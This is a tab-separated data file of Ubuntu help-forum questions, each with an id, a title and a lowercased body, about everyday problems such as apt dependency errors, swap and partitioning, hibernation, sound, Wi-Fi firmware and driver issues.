196720	apache2 post installation	i use the following command to install apache server : sudo apt-get install apache2 the installation process seems to have completed without any problems . when i point my browser to localhost:80 , the following message comes ( which tells the server is properly running ) it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . now my problem is , where the server is installed in my machine ? where is the `` docroot '' ? ( i need the docroot to deploy new webpages ) i use ubuntu 12.04 lts
196721	what is lxsession ?	running lxsession my appearance settings changed to something that looked like the lxde session ( while my normal session is lubuntu ) . running lxsession-edit opens the desktop sessions settings that allows to decide which programs should start automatically at login . running lxsession-logout opens the options to logout , shut down and so on . in /home/username/.config/lxsession there are 2 directories ( lubuntu and lxde ) containing a file called desktop.conf . can i save sessions in lxsession , and does it have other options beside what its main definition states ( `` lxsession is the standard session manager used by lxde . lxsession automatically starts a set of applications and sets up a working desktop environment '' ) ?
196724	how to assign swap space for ubuntu 12.04lts ?	i have total 4 drives . the primary one is of type ext3 ( ubuntu with 20gb free ) and other 3 partitions are ntfs format/mount ( with 20gb free ) installation . i installed without swap space because i did n't know how to create it . how can i assign swap space after installation without damaging my old data . and can i use that swap space at emergency time ? plz help me . thanks . : )
196728	getting this message when i try to update from a terminal	w : failed to fetch http : //ppa.launchpad.net/jsevi83/unity/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/jsevi83/unity/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i get this at the end of trying to update . help !
196730	installed ubuntu server , then kubuntu package : some problems	i recently installed ubuntu server x64 ; i then realized there was no window manager built in ( in retrospect it makes sense , did n't think of it at the time ) . i have been having recurring crash report messages ( system remains functional though ) mainly before a shutdown or on login . as in general in linux i do n't think it is something normal , i am thinking if i am doing something wrong or how i could investigate further . i am wondering whether going for the x64 and/or ubuntu server + kubuntu package might have left some problems behind . from my past experience with another unix o/s ( freebsd ) i never had crash issues .
196732	playing sounds in python quickly without any extra libs ?	i was wondering is it possible to play sounds in ubuntu using quickly and python without including any libs like pygame or pymedia or anything ? just the stock packages that come with python ? thank you
196734	kubuntu , ubuntu ( unity ) : which is faster ?	i installed kubuntu package on top of ubuntu server ; it works alright but compared to the specs of the computer ( i3,4gb ram ) i would expect more . the problem is not so much the speed of execution of applications but rather the smoothness of the ui . ( kde ) ( frame rate ? ) for example chrome browser , skype ... i do n't know if this has to do strictly with how these applications were ported to linux or with the system itself ( i guess the first ) . thank you for any suggestions to improve performance and ui responsiveness . ( edit ) maybe tweaking the nvidia-settings could have some effect .
196735	resizing partitioned windows7/ubuntu12.04	i have a windows7 600gb hd that i partitioned to 350gb for windows7 and 250gb for ubuntu , but after some times i started getting messages that my hd is running out of space whenever i used the ubuntu os . then i realized the ubuntu os is installed in a space of 17gb which i do n't know how it came about . my question is how to resize the the 17gb so that i can have the ubuntu os in the 250gb . i am new in ubuntu and need help desperately cos i do n't wan na loose my work there ... .
196736	unable to use canon lbp printer after upgrading ubuntu	i had used canon lbp2900b ( laserjet ) in ubuntu 10.04 earlier after installing steps as suggested by radu kotescu 's site . after upgrading to 12.04.1 i see that printer options are available as usual but not a single page can be printed . if i open a pdf document by evince and try to print a page , the following message appears on the terminal : ` **warning : gnome-keyring : : could n't connect to : /tmp/keyring-9mrptj/pkcs11 : no such file or directory** . another change i notice is that earlier it was normal to see two printers in the options for printers after installation was completed and installation details suggested which one is to be made the default printer for my purpose . these are available now also but the default printer option had automatically changed ( to the best of my knowledge ) . please suggest some way to make the printer work . i understand the previous driver downloaded from radu kotescu 's site was specifically for 10.04 and now i am running 12.04 . so the situation a bit complicated . ( please also note that apparmor is in enforced mode , relevant profile being /usr/sbin/cupsd , but this was same in 10.04 version ) what should i do now ?
196749	what utility is like ten clips , providing an enumerated clipboard ?	a very useful ( windows ) utility i use is tenclips - http : //www.paludour.net/tenclips.html it allows you to create enumerated clipboards/emacs-like buffers easily using ctrl + f1 , ctrl + f2 , ctrl + f3 , etc. , copy to the clipboard in the first buffer , switch to the second buffer , copy without loosing our first buffer , switch back to the first buffer and paste , switch to the second buffer and paste and so forth . does something like this exist for ubuntu ? the closest post i could find was looking for an application that saves clipboard history which recommended parcellite ( http : //parcellite.sourceforge.net/ ? page_id=2 ) - which keeps the history - but this is not quite what i 'm after . if not i might make this a pet project : d
196757	hd0 out of disk grub rescue	my laptop has dual boot windows and linux . my system was running fine.after some time it got hangged so i switched it off directly and again restarted it.but when i restarted it gives me error- hd0 out of disk follwed by grub rescue . when i start the laptop it throws out soft sound also .
196768	how to install updates via command line ?	good day , when i log into my web server via ssh i see the information : 88 packages can be updated . 80 updates are security updates i tried apt-get update then apt-get upgrade but each time i log in i still see the message about updates . how do i install them ?
196773	broken dependencies after installing netatalk	recently i 've installed netatalk from sources on my home server . few days ago i 've tried to install some packages using apt-get but i 've got a message about broken dependencies . the following packages have unmet dependencies : krb5-multidev : depends : libkrb5-3 ( = 1.9.1+dfsg-1ubuntu2.3 ) but 1.10.1+dfsg-2 is to be installed depends : libgssapi-krb5-2 ( = 1.9.1+dfsg-1ubuntu2.3 ) but 1.10.1+dfsg-2 is to be installed libc-dev-bin : depends : libc6 ( < 2.14 ) but 2.15-0ubuntu15 is to be installed recommends : manpages-dev but it is not going to be installed libc6-dev : depends : libc6 ( = 2.13-20ubuntu5.1 ) but 2.15-0ubuntu15 is to be installed libnih1 : depends : libc6 ( < 2.14 ) but 2.15-0ubuntu15 is to be installed ushare : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not going to be installed depends : libdlna0 : i386 but it is not going to be installed depends : libupnp3 : i386 ( > = 1.4.3 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . sudo apt-get -f install wants to completely remove all packages i 've got installed on my system . what can i do ?
196776	super-s does n't work after reconnecting usb keyboard	situation : two laptops using the same usb keyboard and usb mouse ( that are both connected to the display which also serves as a usb hub ; switching is done by usb cable from the display to the respective laptop ) . one laptop has ubuntu 10.04 and works fine , the other ubuntu 12.04 and this one appears to have the following problem . when i start it with usb cable from monitor connected everything works ok , but when i either connect usb cable after logging in or disconnect the cable ( to use the keyboard for the other laptop ) and then reconnect it again , some unity shortcuts , such as super + s for showing multiple desktops grid or super + a for that unity application menu , do not work . i have to logout and login back , which of course mean to close everything and is very inconvenient . is there any easier way to make it work , restarting some service or something ? thx .
196782	gnome install error ( 1 )	i 'm trying to install gnome on my ubuntu 12.04 p.pangolin and getting the following errors : root @ *** : ~ # sudo apt-get install gnome-core gnome-session-fallback reading package lists ... done building dependency tree reading state information ... done gnome-core is already the newest version . gnome-session-fallback is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 5 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up bluez ( 4.98-2ubuntu7 ) ... start : job failed to start invoke-rc.d : initscript bluetooth , action `` start '' failed . dpkg : error processing bluez ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of gnome-bluetooth : gnome-bluetooth depends on bluez ( > = 4.36 ) ; however : package bluez is not configured yet . dpkg : error processing gnome-bluetooth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-shell : gnome-shell depends on gnome-bluetooth ( > = 3.0.0 ) ; however : package gnome-bluetooth is not configured yet . dpkg : error processing gnome-shell ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-user-share : gnome-user-share depends on gnome-bluetooth ; however : package gnome-bluetooth is not configured yet . dpkg : error processing gnome-user-share ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-core : gnome-core depends on gno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already nome-bluetooth ( > = 3.0 ) ; however : package gnome-bluetooth is not configured yet . gnome-core depends on gnome-shell ( > = 3.0 ) ; however : package gnome-shell is not configured yet . gnome-core depends on gnome-user-share ( > = 3.0 ) ; however : package gnome-user-share is not configured yet . dpkg : error processing gnome-core ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : bluez gnome-bluetooth gnome-shell gnome-user-share gnome-core e : sub-process /usr/bin/dpkg returned an error code ( 1 ) syslog : oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : bluetooth daemon 4.98 oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : starting sdp server oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : opening l2cap socket : address family not supported by protocol oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : server initialization failed oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : failed to init alert plugin oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : failed to init time plugin oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : failed to init proximity plugin oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : failed to open control socket : address family not supported by protocol ( 97 ) oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : ca n't init bnep module oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : failed to init network plugin oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : unable to start sco server socket oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : failed to init audio plugin oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : failed to init gatt_example plugin oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : ca n't open hci socket : address family not supported by protocol ( 97 ) oct 5 16:04:17 ks34900 bluetoothd [ 5176 ] : adapter_ops_setup failed oct 5 16:04:17 ks34900 kernel : init : bluetooth main process ( 5176 ) terminated with status 1 oct 5 16:04:17 ks34900 kernel : init : bluetooth main process ended , respawning oct 5 16:04:17 ks34900 bluez : stopping uarts oct 5 16:04:17 ks34900 bluez : stopping rfcomm any thoughts ?
196794	hibernation to a swap file 12.04 , fragfile output	i 've been trying for some time now , to get hibernation working in 12.04 on my dell xps17 . i dual-boot windows 7 and ubuntu , each having their own partition and one shared partition for all my data and documents . as i would like to be able to switch from ubuntu to windows without losing all the things i was currently doing in ubuntu , i would like to be able to use hibernation . in order to achieve this i 've followed the information here . only instead of creating my swap file on my linux partition ( which is formatted : ext4 ) , i 've chosen to create one on my shared partition ( which is formatted : ntfs ) . there is a problem with this though ( at least , that 's what i think the problem is ) , because when i call : sudo filefrag -v /media/data/ubuntu_swap_space/6gib.swap i get the following output : filesystem type is : 65735546 file size of /media/data/ubuntu_swap_space/6gib.swap is 6442450944 ( 1572864 blocks , blocksize 4096 ) discontinuity : block 22 is at 25829097 ( was 232498 ) /media/data/ubuntu_swap_space/6gib.swap : 2 extents found so i 'm not sure what i need to fill in as an offset to follow the rest of the earlier mentioned information . i 've tried both the location of block 22 and the number that is listed after that , but when i then try sudo pm-hibernate nothing happens and this shows up in my /var/log/pm-suspend.log : s2disk : could not use the resume device ( try swapon -a ) . reason : no such device hope someone can help me out with this ! if you need more information about anything , please let me know .
196796	tri-boot win 7 64+ubuntu 12.04+backtrack 5	i 'd like to know what is the best procedure for doing a tri-boot ? i do n't want to re-size windows partition i want to re-install it from scratch . i heard that it 's better to install windows first , but will windows allow me to create the right partition structure ? and what is the best scheme ? should i create a primary for windows and extended for everything else ? if so what should my logicals partitions be ? is it ubuntu + swap ( shared ) + backtrack root+ backtrack home , or should i just make 4 primary partition for windows + ubuntu + backtrack + swap ? and what are the formats i should choose for linux partitions ? i would appreciate any info on this topic
196797	i can not remove/install software some dependency issue ?	i 'm having difficulty trying to install/uninstall applications in ubuntu 12.04 lts . i have this warning error that appears on my desktop in the form of a red icon with a line through it and it states : an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' â this usually means that your installed packages have unmet dependencies . i tried to repair automatically through ubuntu software center and i kept getting errors or it just did n't seem to work . afterwards , i opened terminal and used sudo apt-get check command to see what the problem was and the results yielded : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libjack-jackd2-0 : breaks : libjack-jackd2-0 : i386 ( ! = 1.9.8~dfsg.1-1ubuntu1 ) but 1.9.8~dfsg.2-1precise1 is installed libjack-jackd2-0 : i386 : breaks : libjack-jackd2-0 ( ! = 1.9.8~dfsg.2-1precise1 ) but 1.9.8~dfsg.1-1ubuntu1 is installed e : unmet dependencies . try using -f. after i ran sudo apt-get -f install ( in an attempt to fix the issue at hand ) , i encountered the following errors/code : okudaira @ haru-kano : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libjack-jackd2-0 suggested packages : jackd2 the following packages will be upgraded : libjack-jackd2-0 1 upgraded , 0 newly installed , 0 to remove and 24 not upgraded . 1 not fully installed or removed . need to get 0 b/197 kb of archives . after this operation , 3,072 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 181702 files and directories currently installed . ) preparing to replace libjack-jackd2-0 1.9.8~dfsg.1-1ubuntu1 ( using ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ) ... unpacking replacement libjack-jackd2-0 ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb localepurge : disk space freed in /usr/share/locale : 0 kib localepurge : disk space freed in /usr/share/man : 0 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib total disk space freed by localepurge : 0 kib e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the real problem i 'm having is interpreting what is being stated . i 'm fairly new to the ubuntu experience so i 'm not very well-versed with the terminology and the entire in 's and out 's . can someone tell me what 's wrong with my system ? i can no longer install/remove any programs at all .
196801	can not adjust brightness after sleep	i have a toshiba satellite r830 laptop with ubuntu 12.04.1 64 bit . the fn + f6 and fn + f7 buttons adjust brightness until i put my laptop on sleep . on wakeup they do n't work any longer . is there a solution or a workaround to this issue ?
196808	after update , flash plugin playing video too fast or too slow	last night i did an update and reboot . after that , i could n't reliably play any flash videos . they would either go too fast or stutter ( as if they were buffering every 2 seconds ) . this occurs in both firefox and chrome , however i 'll troubleshoot in chrome because it 's easier to enable/disable plugins at will . with ppapi enabled ( and npapi disabled ) , flash videos play at 1.5x speeds and audio is scrambled . with npapi enabled ( and ppapi disabled ) , flash videos stutter and skip , despite showing a decent buffer . from one old thread , i went into pavucontrol and tried disabling the high def audio controller . i also tried disabling totem plugin to no affect . version other details : linux freshdesk 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ cat /etc/*-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' shockwave flash 11.3 r31 /opt/google/chrome/pepperflash/libpepflashplayer.so 11.3.31.331 ppapi ( out-of-process ) shockwave flash version : 11.2 r202 location : /usr/lib/adobe-flashplugin/libflashplayer.so type : npap 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 8400 gs ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 )
196810	ubuntu 12.04 - unable to mount location	when i try to select my secondary hdd ( internal hdd ) i get this error message : unable to mount location error creating moint point : no such file or directory what kind of sorcery is this ? this is in my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb6 during installation uuid=75537d5d-c9bb-416b-8a6e-10e4c237048e / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb7 during installation uuid=39336cba-ed61-47c2-954c-500d9022f444 none swap sw 0 0
196812	lan not working if cable not inside while booting	i have an annoying problem . every time the lan cable is not in while booting , i can not get any connection to the internet , network , router , etc . i tried to plug in and out the cable several times - but nothing happened , besides that i always shows that lan is disconnected . the same happens after sleeping mode . i am new to ubuntu ( 12.04 ) and hoping for a hint ! thanks in advance !
196814	how to fix sources list to get the mongodb packages	i was reading a tutorial for mongodb and it ended up to where i should have added a deb package in ubuntu 11.10 sources list , i was able to find /etc/apt/sources.list.d/ . i need to fetch the package from the following directory : http : //downloads-distro.mongodb.org/repo/ubuntu-upstart/dists/dist/10gen/binary-amd64/ however i do not know actually what is the exact way of pointing to the package mongodb-10gen_2.2.0_amd64.deb in there . i added the following but whenever i issue sudo apt-get update , it fails to fetch the package : deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart/dists/dist/10gen binary-amd64 mongodb-10gen_2.2.0_amd64
196818	how do i get a broadcom 4306 [ 14e4:4324 ] rev 03 working ?	i have a dell d610 which i have just dual booted with ubuntu 12.04 lts . i get network- > wireless- > `` firmware missing '' in ubuntu but wireless ok with xp . using a terminal i find the broadcom device is : bcm4306 [ 14e4:4324 ] rev 03 . i tried `` sudo apt-get install firmware-b43-installer '' and got `` an unsupported bcm4301 , bcm4306 or bcm4306/2 device was found . use b43legacy firmware ( firmware-b43legacy-installer package ) instead . aborting . '' i then removed this half installed package . then i did `` sudo apt-get install firmware-b43legacy-installer '' . appeared to install but i still get `` firmware missing '' . i 've tried rebooting but no good .
196819	i have only one partition but i want to have one more	i have only one partition in ubuntu where my boot files are also there . i want to have one more partition how can i do it ?
196820	whats the name of the dropdown panel with the im status ?	so i 'm trying to work out whats the name of the drop down panel in ubuntu , the one that lets you set your im status ( online , offline , invisible etc etc ) . i was on 12.04 and replaced empathy with pidgin easy enough , and this still kept the options in this bar , however when i upgraded to 12.10 beta 3 the bar has now dissapeared , but before i can search for answers i need to know what i can search for : )
196829	'module ' object has no attribute 'element_make_factory '	i have this code : import pygst import st , pygtk player_name = gst.element_make_factory ( `` playbin '' , `` multimedia player '' ) player_name.set_property ( `` uri '' , `` ../media/alert.mp3 '' ) player_name.set_state ( gst.playing ) it keeps throwing me the following error : player_name = gst.element_make_factory ( `` playbin '' , `` multimedia player '' ) attributeerror : 'module ' object has no attribute 'element_make_factory' nay way to solve this and why is this happening ? if i print gst i get the following : < module 'gst ' from '/usr/lib/python2.7/dist-packages/gst-0.10/gst/__init__.pyc ' > so it is a module !
196831	acer aspire one 756 with pentium b967	will ubuntu work on the acer aspire one 756 with the pentium b967 processor , and if so , what version should be used ?
196839	no sound on 12.04 ( asus u36j )	so i just installed ubuntu on my system , and a bunch of stuff does n't work . including the sound . i 'm going through the troubleshooting over at https : //help.ubuntu.com/community/soundtroubleshooting , but i 'm stuck . i 'll go through the steps for you guys so you know my situation . 1-3 ) my sound is not muted 4 ) $ sudo aplay -l aplay : device_list:252 : no soundcards found ... 5 ) find /lib/modules/`uname -r` | grep snd returns a large list of items 6 ) lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : asustek computer inc. device 10b3 flags : bus master , fast devsel , latency 0 , irq 3 memory at d9c00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : snd-hda-intel but then i go to http : //www.alsa-project.org/main/index.php/matrix : main and i co n't find my audio card . do i just suck at searching ? or am i just hosed and my audio card is n't supported ? is there anything else i can do ?
196841	ubuntu 12.10 wo n't upgrade nvidia drivers	i 've been running 12.10 for about a week now with pretty minimal issues so far ; the main problem i 'm experiencing is that the nvidia drivers i have are refusing to upgrade . i 'm currently using the experimental drivers , so i 'm not sure if that has anything to do with it . either way , i was hoping to see if anyone could make any sense of this output : from apt-get upgrade : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-headers-generic linux-image-generic ubuntu-desktop the following packages will be upgraded : nvidia-settings-updates 1 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 308 not fully installed or removed . need to get 0 b/1,820 kb of archives . after this operation , 1,675 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 207320 files and directories currently installed . ) preparing to replace nvidia-settings-updates 304.43-0ubuntu1 ( using ... /nvidia-settings-updates_304.51-0ubuntu1_amd64.deb ) ... unpacking replacement nvidia-settings-updates ... dpkg : error processing /var/cache/apt/archives/nvidia-settings-updates_304.51-0ubuntu1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man1/nvidia-settings.1.gz ' , which is also in package nvidia-settings-experimental-304 304.48-0ubuntu1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/nvidia-settings-updates_304.51-0ubuntu1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what would be the solution to this ? i already tried an apt-get clean along with a apt-get -f upgrade after , and that did n't solve the problem .
196843	can i run 12.10 through vmware workstation ?	i have windows xp professional , and have installed vmware workstation . i intend to use xp as my host system , but i wanted to find out if it is possible to run quantal quetzal as my guest os in vmware workstation .
196845	how do i add the messaging menu to the xfce-panel ?	i am running a pretty peculiar setup right now with lxde , plank and the xfce4-panel . this works fine , but i ca n't seem to find the messaging menu under the system tray options : is there any service i have to add to my autostart apps for the messaging menu to show ?
196846	brightness control not working in lenovo g580	i purchased a new lenovo g580 laptop . but i am totally disappointed when i installed ubuntu on it . almost all drivers are not working . : - ( the laptop configuration is intel i3 processor nvidia geforce 610m graphics card . i could n't find the nvidia drivers in the additional drivers ( jockey ) . the main problem is that the brightness control not working . i tried lots of methods explained in this site , but the result again disappointed me . i am a student and i am using linux , and the brightness control is the most urgent problem that have to be solved . so experts please give me a solution . thanks in advance
196852	virtualbox on ubuntu server 12.04	i have virtualbox 4.2 installed on ubuntu server 12.04 , being managed with phpvirtualbox . the server has fairly low-end specs , with only 512mb of ram , and a pentium 4 prescott cpu @ 2.6 ghz ( i read that people have virtualized on this exact computer ) . when i go to install ubuntu as a guest , it gets to about 13 % -25 % in the install process ( actually copying things to the drive ) , and then i lose all connection to the server . i can not connect with ssh , rdp ( to the guest ) , or phpvbox . when i go to login directly on the server , the login prompt is not working . i can actually erase everything on the display ; including the `` username : `` field . however , the hard drive is still very active . the only ways i can get back to the server are by waiting for the vm to abort ( i guess ) or by restarting the server . any advice on whats causing it ? let me know if you need any logs or extra info .
196857	ftp server not able to connect outside the network on ubuntu 12.04	i am using ubuntu 12.04 lts . i am setting up a ftp server using vsftpd in ubuntu . inside my network the ftp server works perfect , but it does not work outside my network . please help me with the firewall rules so i can use my ftp server anywhere .
196867	error linking standard header file in gcc	i 've a simple code - this works on other platforms but does not work in ubuntu . # include < stdio.h > # include < stdlib.h > int main ( ) { int x=99 ; char str [ 100 ] ; itoa ( 99 , str , 10 ) ; return 0 ; } trying to compile in using terminal in gcc with : gcc test.c but i get the error : /tmp/ccjn77g6.o : in function `main ' : test.c : ( .text+0x35 ) : undefined reference to `itoa' collect2 : ld returned 1 exit status why so ? prototype for itoa is included in stdlib.h
196875	how do i build eidete from source ?	i have recently become interested in eidete screencaster , and i am trying to compile it from source on ubuntu 12.04.1 lts . after running bzr branch lp : eidete , i navigated into the ~/eidete directory and found an install file with the following contents : dependencies : gtk+-3.0 libwnck-3.0 gstreamer-interfaces-0.10 gstreamer-0.10 gstreamer-pbutils-0.10 granite xtst gdk-x11-3.0 installation : bzr branch lp : eidete cd eidete mkdir build cd build cmake .. -dcmake_install_prefix=/usr make sudo make install after some investigation , i believe i have correctly satisfied all package dependencies , as i no longer get complaints about that when i run the cmake .. -dcmake_install_prefix=/usr step . however , when i then try to run make , the build fails with the following output : christopher @ xyzprecise : ~/eidete/build $ make [ 7 % ] generating src/eidete.c , src/widgets/countdown.c , src/widgets/keyview.c , src/widgets/selectionarea.c , src/widgets/end_dialog.c , src/desktop_launcher.c , build/src/config.c error : package `granite ' not found in specified vala api directories or gobject-introspection gir directories compilation failed : 1 error ( s ) , 0 warning ( s ) make [ 2 ] : *** [ src/eidete.c ] error 1 make [ 1 ] : *** [ cmakefiles/eidete.dir/all ] error 2 make : *** [ all ] error 2 the step before that previously complained that i did n't have the necessary version of vala installed , so i installed it from the vala ppa and did n't get the warning from cmake anymore after that . all other packages required i installed from the ubuntu precise repositories , including libgranite-dev . so , why is make complaining about granite , and how do i correct this so i can build eidete successfully ?
196881	12.04 installer wo n't accept mis-alligned partition	so i upgraded ubuntu from 10.04 to 12.04 and it had issues . long story short , i backed up everything and want to reinstall . the installer apparently really does n't like installing on mis-aligned partitions . i get the error the partition /dev/sda5 assigned to / starts on an offset of 3072 bytes ... there are two buttons at the bottom `` go back '' and `` continue '' the problem is that they both do the same thing - namely it kicks me back to the partition table screen . how do i force it to continue ? note : formatting the entire drive is not an option as it has a windows installation on there ( sda1 , 2 and 3 )
196884	how to install gnome shell extensions offline ?	i know how to go to the https : //extensions.gnome.org/ website and download gnome-shell extensions , but now i need to install some extensions available there on a computer without any internet access at all . it is in a internal corporate network and there 's no way i can get outside internet access on it , so i must find another way . i can copy files in a usb disk . at my home computer , i have found my extensions at ~/.local/share/gnome-shell/extensions/ but just copying this folder to the target corporate computer did n't do the trick . running gnome-tweak-tool gives me a `` install shell extension '' button but i do n't know how to download an extension in a format acceptable to install using this button . i have tried to point to the folder above but it did n't work either . what do i need to do ?
196885	what partition of hdd should ubuntu be installed ?	does installation of ubuntu from wubi require another partition for loading ? if it loads on c : then is it and os environment only ? kindly explain . should it be a primary partition only ? as i understand that only form primary partition the os can be loaded .
196888	error `` packages 404 not found ''	i have got this error w : failed to fetch http : //ppa.launchpad.net/stk/dev/ubuntu/dists/precise/main/binary-i386/packages 404 not found many times when i try install a software and i cant install when i get it , for ie : wine , sublime text 2 and others . now i typed below code to install sublime text 2 : sudo add-apt-repository ppa : webupd8team/sublime-text-2 & & sudo apt-get update & & sudo apt-get install sublime-text and i got : http : //paste.ubuntu.com/1262514/ anyone can help me ? thank you in advance .
196890	how to find the bitrate of an mp3 file via command line ?	what is the terminal command that can used to find the bitrate of an mp3 file ? is there any other option available other than mpg321 -t name.mp3 ?
196893	how do i prevent immediate wake up from suspend ( version ii ) ?	this question covers one reason a computer might immediately wake after suspend : how do i prevent immediate wake up from suspend ? i seem to have a different one . after a recent security patch update on ubuntu 11.04 - the natty narwhal , the machine wakes up immediately after suspending . the relevant log lines seem to be : oct 5 09:01:02 hardhat kernel : [ 585671.422973 ] pm : syncing filesystems ... done . oct 5 09:01:02 hardhat kernel : [ 585671.475283 ] pm : preparing system for mem sleep oct 5 09:01:02 hardhat kernel : [ 585671.475399 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . oct 5 09:01:02 hardhat kernel : [ 585671.490593 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . oct 5 09:01:02 hardhat kernel : [ 585671.510542 ] pm : entering mem sleep oct 5 09:01:02 hardhat kernel : [ 585671.510558 ] suspending console ( s ) ( use no_console_suspend to debug ) oct 5 09:01:02 hardhat kernel : [ 585671.511061 ] sd 1:0:1:0 : [ sdc ] synchronizing scsi cache oct 5 09:01:02 hardhat kernel : [ 585671.511124 ] sd 0:0:1:0 : [ sdb ] synchronizing scsi cache oct 5 09:01:02 hardhat kernel : [ 585671.511193 ] sd 0:0:1:0 : [ sdb ] result : hostbyte=did_bad_target driverbyte=driver_ok oct 5 09:01:02 hardhat kernel : [ 585671.511200 ] pm_op ( ) : scsi_bus_suspend+0x0/0x20 returns -5 oct 5 09:01:02 hardhat kernel : [ 585671.511203 ] pm : device 0:0:1:0 failed to suspend async : error -5 oct 5 09:01:02 hardhat kernel : [ 585671.511296 ] sd 1:0:1:0 : [ sdc ] stopping disk oct 5 09:01:02 hardhat kernel : [ 585672.039397 ] pm : suspend of drv : sd dev:1:0:1:0 complete after 529.213 msecs oct 5 09:01:02 hardhat kernel : [ 585672.039486 ] pm : some devices failed to suspend oct 5 09:01:02 hardhat kernel : [ 585672.039507 ] sd 0:0:0:0 : [ sda ] starting disk oct 5 09:01:02 hardhat kernel : [ 585672.039696 ] sd 0:0:1:0 : [ sdb ] starting disk oct 5 09:01:02 hardhat kernel : [ 585672.039776 ] sd 1:0:1:0 : [ sdc ] starting disk oct 5 09:01:02 hardhat kernel : [ 585672.039839 ] sd 0:0:1:0 : [ sdb ] start_stop failed oct 5 09:01:02 hardhat kernel : [ 585672.039843 ] sd 0:0:1:0 : [ sdb ] result : hostbyte=did_bad_target driverbyte=driver_ok oct 5 09:01:02 hardhat kernel : [ 585672.039853 ] pm_op ( ) : scsi_bus_resume_common+0x0/0x60 returns 262144 oct 5 09:01:02 hardhat kernel : [ 585672.039861 ] pm : device 0:0:1:0 failed to resume async : error 262144 oct 5 09:01:02 hardhat kernel : [ 585673.533456 ] pm : resume of drv : sd dev:1:0:1:0 complete after 1496.158 msecs oct 5 09:01:02 hardhat kernel : [ 585673.533550 ] pm : resume of drv : scsi_device dev:1:0:1:0 complete after 1496.242 msecs oct 5 09:01:02 hardhat kernel : [ 585673.533557 ] pm : resume of drv : scsi_disk dev:1:0:1:0 complete after 1496.157 msecs oct 5 09:01:02 hardhat kernel : [ 585673.533645 ] pm : resume of devices complete after 1496.634 msecs oct 5 09:01:02 hardhat kernel : [ 585673.533782 ] pm : resume devices took 1.500 seconds oct 5 09:01:02 hardhat kernel : [ 585673.533801 ] pm : finishing wakeup .
